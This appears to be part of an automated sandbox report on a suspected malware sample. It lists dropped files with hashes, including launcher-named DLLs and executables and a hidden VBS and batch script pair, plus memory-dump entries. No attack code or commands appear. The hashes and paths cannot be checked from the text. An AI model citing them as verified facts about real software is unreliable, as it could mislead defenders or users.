MD5 8d8feec31d7a14f6a75d1602156ade04
SHA1 5ce6771b1143afc6132345dfceda3d0a1f4e4036
SHA256 89be3f9b4e1cc1ff193ce0dd4e6bb3221e4888689c7462d466fa980f11f0c1d0
SHA512 510ff0f1d77d11e78b2bc9b958fd51cf0b0c12b22fab8f5242393d4883d5c4a7dcd6b9f510bae79f69aee0d112d7afd6c365475e6f9db9b939c7cbff8d7d8bff

C:\ProgramData\Epic\Launcher\ffmpeg.dll

MD5 d49e7a8f096ad4722bd0f6963e0efc08
SHA1 6835f12391023c0c7e3c8cc37b0496e3a93a5985
SHA256 f11576bf7ffbc3669d1a5364378f35a1ed0811b7831528b6c4c55b0cdc7dc014
SHA512 ca50c28d6aac75f749ed62eec8acbb53317f6bdcef8794759af3fad861446de5b7fa31622ce67a347949abb1098eccb32689b4f1c54458a125bc46574ad51575

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

MD5 b4917be25f1d74c828f963a7be4bddf8
SHA1 59177a06b6e1e315ca397eec551579519d427055
SHA256 49567980575ec713202c35b3d65f4d44ae185caba647e676e92c407aa4e56489
SHA512 468a4b24d43d87265ef40c1ec51a0ed0d1db13d08528c86339a4af7f8149d9cc94e62bd7e95b6ada6d9ed5994663927dc9716da1f353148e12eac01a22715ce6

C:\ProgramData\Epic\Launcher\vk_swiftshader.dll

MD5 05ea152d9ec771145cff330d5c1b9fdf
SHA1 cd3e029663761ec3c9a05bb39154ac6051698812
SHA256 381e490c20f19ac33fe8a5c784bfac79090f6e86ee44c19d905cf8b866031e67
SHA512 940c8cecfa98b7a8585e8f596cb9d18663e95fe2bedfeb3accbf215c2b8ae0511da11f4427b1693806a7081496551bdb0e2d3a393fbbad7ed6b8292b77cc86cb

C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs

MD5 323e6511a0f7e82c511ea954d1530b13
SHA1 8b167e573b0663d1bc5a60f0d7b3f267f0bc1a20
SHA256 48a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597
SHA512 757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a

C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat

MD5 96754a78d50bca33838bb0f77cc73f0c
SHA1 527b6f9a10716869b8200eae5c871cea777f710e
SHA256 4c4dff3e73f2754657463e67d497389e45f141778b4923641e45bf25bbe04495
SHA512 8a3b96a70853ba7c12d399843d6e26acb1007f0c165b33c19e521a385fa38b62e226aeb41a0dfcc7c9f71d9ca60c694d1bced5b1881af174084c32faff6582f6

memory/3084-1345-0x000001D1AD390000-0x000001D1AD3A0000-memory.dmp

memory/3084-1346-0x000001D1AD390000-0x000001D1AD3A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 99ae5b177aacf1cd37b1b45cd1cc17ff
SHA1 a4b29799e1fb3afa9ba57e79b52f8cf3814f82cb
SHA256 cf64573a1d18dfa67bf18f53511bfb3c089bcb4396377f195ee5109c2cee4a48
SHA512 91f8ce2998b6e8f96680ae5cb5a4ab62a470513ff91fa7641b64428f945aaffa7ec11e5c1443e619e16472ad6b466a32ee23a88c76f1ce22821c84d8f4be76fb

memory/3084-1344-0x00007FFC18530000-0x00007FFC18FF1000-memory.dmp

memory/5180-1348-0x00000233C0F80000-0x00000233C0F90000-memory.dmp

memory/3084-1349-0x000001D1AD390000-0x000001D1AD3A0000-memory.dmp

memory/3084-1351-0x00007FFC18530000-0x00007FFC18FF1000-memory.dmp